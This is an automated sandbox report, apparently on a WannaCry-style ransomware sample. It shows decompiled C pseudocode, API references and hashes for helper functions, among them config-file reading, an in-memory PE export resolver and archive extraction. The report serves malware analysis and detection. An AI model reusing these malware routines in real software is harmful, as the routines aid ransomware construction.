                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ??0exception@@ExceptionThrowmemcpy
                • String ID:
                • API String ID: 2382887404-0
                • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON
                Download Yara Rule
                APIs
                • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                • fclose.MSVCRT(00000000), ref: 00401058
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: fclosefopenfreadfwrite
                • String ID: c.wnry
                • API String ID: 4000964834-3240288721
                • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79filememoryCOMMON
                Download Yara Rule
                C-Code - Quality: 24%
                			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				signed int _v44;
				void* _t18;
				void* _t28;
				long _t34;
				intOrPtr _t38;

				_push(0xffffffff);
				_push(0x4081f0);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t38;
				_v44 = _v44 | 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t18;
				if(_t18 != 0xffffffff) {
					_t34 = GetFileSize(_t18, 0);
					_v40 = _t34;
					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
						_t28 = GlobalAlloc(0, _t34);
						_v36 = _t28;
						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
							_push(_a8);
							_push(0);
							_push(0);
							_push(_v32);
							_push(_t28);
							_push(_a4);
							if( *0x40f898() != 0) {
								_push(1);
								_pop(0);
							}
						}
					}
				}
				_push(0xffffffff);
				_push( &_v20);
				L004076FA();
				 *[fs:0x0] = _v20;
				return 0;
			}













                0x004018fc
                0x004018fe
                0x00401903
                0x0040190e
                0x0040190f
                0x0040191c
                0x00401922
                0x00401925
                0x00401928
                0x0040193a
                0x00401940
                0x00401946
                0x00401950
                0x00401952
                0x00401958
                0x0040196a
                0x0040196c
                0x00401971
                0x00401987
                0x0040198a
                0x0040198b
                0x0040198c
                0x0040198f
                0x00401990
                0x0040199b
                0x0040199d
                0x0040199f
                0x0040199f
                0x0040199b
                0x00401971
                0x00401958
                0x004019a0
                0x004019a5
                0x004019a6
                0x004019d5
                0x004019e0

                APIs
                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                • String ID:
                • API String ID: 2811923685-0
                • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93fileCOMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L00407700();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}











                0x00405bb2
                0x00405bbb
                0x00405bd2
                0x00405bd7
                0x00405bdc
                0x00405bdf
                0x00405be1
                0x00405be4
                0x00405c18
                0x00405c1b
                0x00405c24
                0x00405c29
                0x00405c32
                0x00405c36
                0x00405c36
                0x00405c38
                0x00405c42
                0x00405c44
                0x00405c6c
                0x00405c6f
                0x00405c72
                0x00405c77
                0x00405c7a
                0x00405c7d
                0x00405c80
                0x00405c83
                0x00405c90
                0x00405c90
                0x00405c4c
                0x00405c4f
                0x00405c51
                0x00405c57
                0x00405c5b
                0x00405c5e
                0x00405c61
                0x00405c64
                0x00405c64
                0x00405c96
                0x00405c98
                0x00000000
                0x00405c98
                0x00405be9
                0x00000000
                0x00000000
                0x00405c04
                0x00405c09
                0x00405c20
                0x00000000
                0x00405c20
                0x00405c0b
                0x00000000
                0x00405bc7
                0x00405bca
                0x00405c11
                0x00405c11
                0x00405c9a
                0x00405c9e
                0x00405c9e

                APIs
                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: File$Pointer$??2@Create
                • String ID:
                • API String ID: 1331958074-0
                • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00402924(intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed short* _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t59;

				_t26 = _a4;
				_t44 =  *((intOrPtr*)(_t26 + 4));
				_t28 =  *_t26 + 0x78;
				_v8 = _t44;
				if( *((intOrPtr*)(_t28 + 4)) == 0) {
					L11:
					SetLastError(0x7f);
					_t29 = 0;
				} else {
					_t58 =  *_t28;
					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
					_t59 = _t58 + _t44;
					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L11;
					} else {
						_t8 =  &_a8; // 0x402150
						if( *_t8 >> 0x10 != 0) {
							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
							_a4 = 0;
							if(_t30 <= 0) {
								goto L11;
							} else {
								while(1) {
									_t32 =  *_t55 + _t44;
									_t15 =  &_a8; // 0x402150
									__imp___stricmp( *_t15, _t32);
									if(_t32 == 0) {
										break;
									}
									_a4 = _a4 + 1;
									_t55 = _t55 + 4;
									_t41 =  &(_t41[1]);
									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
										_t44 = _v8;
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								_t33 =  *_t41 & 0x0000ffff;
								_t44 = _v8;
								goto L14;
							}
						} else {
							_t9 =  &_a8; // 0x402150
							_t37 =  *_t9 & 0x0000ffff;
							_t49 =  *((intOrPtr*)(_t59 + 0x10));
							if(_t37 < _t49) {
								goto L11;
							} else {
								_t33 = _t37 - _t49;
								L14:
								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
									goto L11;
								} else {
									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
								}
							}
						}
					}
				}
				L12:
				return _t29;
			}

















                0x00402928
                0x0040292f
                0x00402934
                0x00402938
                0x0040293e
                0x004029a5
                0x004029a7
                0x004029ad
                0x00402940
                0x00402940
                0x00402942
                0x00402946
                0x0040294a
                0x00000000
                0x00402951
                0x00402951
                0x0040295a
                0x00402971
                0x00402973
                0x00402977
                0x0040297a
                0x00000000
                0x0040297c
                0x00402981
                0x00402983
                0x00402986
                0x00402989
                0x00402993
                0x00000000
                0x00000000
                0x00402995
                0x00402998
                0x0040299f
                0x004029a3
                0x0040297e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004029a3
                0x004029b4
                0x004029b7
                0x00000000
                0x004029b7
                0x0040295c
                0x0040295c
                0x0040295c
                0x00402960
                0x00402965
                0x00000000
                0x00402967
                0x00402967
                0x004029ba
                0x004029bd
                0x00000000
                0x004029bf
                0x004029c8
                0x004029c8
                0x004029bd
                0x00402965
                0x0040295a
                0x0040294a
                0x004029af
                0x004029b3

                APIs
                • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ErrorLast_stricmp
                • String ID: P!@
                • API String ID: 1278613211-1774101457
                • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59stringCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}












                0x00401dfe
                0x00401e00
                0x00401e05
                0x00401e0e
                0x00401e1a
                0x00401e21
                0x00401e2d
                0x00401e32
                0x00401e38
                0x00401e3b
                0x00401e3f
                0x00401e41
                0x00401e4a
                0x00401e5b
                0x00401e60
                0x00401e65
                0x00401e82
                0x00401e87
                0x00401e87
                0x00401e8a
                0x00401e8b
                0x00401e41
                0x00401e90
                0x00401e96
                0x00401e98
                0x00401e07
                0x00401e07
                0x00401e9d

                APIs
                • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: AttributesFilestrcmp
                • String ID: c.wnry
                • API String ID: 3324900478-3240288721
                • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405C9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));
					}
					_push(_t9);
					L004076E8();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}




                0x00405ca0
                0x00405ca6
                0x00405cb1
                0x00405cb6
                0x00405cb6
                0x00405cbc
                0x00405cbd
                0x00405cc6
                0x00405ca8
                0x00405cac
                0x00405cac

                APIs
                • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ??3@CloseHandle
                • String ID: $l@
                • API String ID: 3816424416-2140230165
                • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004019E1 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 25%
                			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}







                0x004019e5
                0x004019ec
                0x00401a19
                0x00000000
                0x00401a19
                0x004019ee
                0x004019f2
                0x00401a08
                0x00401a10
                0x00401a11
                0x00401a1d
                0x00401a2c
                0x00401a3a
                0x00401a3e
                0x00000000
                0x00401a3e
                0x00401a13
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: CriticalSection$Leave$Entermemcpy
                • String ID:
                • API String ID: 3435569088-0
                • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                Uniqueness

                Uniqueness Score: -1.00%